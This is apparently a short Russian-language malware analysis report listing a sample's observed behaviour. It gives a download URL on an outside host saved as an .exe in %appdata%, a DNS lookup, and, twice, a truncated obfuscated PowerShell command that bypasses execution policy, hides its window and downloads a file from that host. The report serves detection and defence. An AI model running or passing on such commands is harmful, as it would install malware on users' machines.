Техническая информация
- http://poooperfath.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^wERSHE^Ll.eX^e -^eXECuT^iOn^pOLiC^Y^ BYPaSS -NOpr^of^i^LE^ -Wi^ndoW^st^yle^ Hi^ddEn (nE^w^-obJeCt sYs^t^Em.ne^t^.WEb^CLI^EN^t).^DO^wnLOA^dF^iLe('http://poooperfath.top/read.php?f=0....
- DNS ASK po###erfath.top
- '<SYSTEM32>\cmd.exe' /c "po^wERSHE^Ll.eX^e -^eXECuT^iOn^pOLiC^Y^ BYPaSS -NOpr^of^i^LE^ -Wi^ndoW^st^yle^ Hi^ddEn (nE^w^-obJeCt sYs^t^Em.ne^t^.WEb^CLI^EN^t).^DO^wnLOA^dF^iLe('http://poooperfath.top/read.php?f=0....' (со скрытым окном)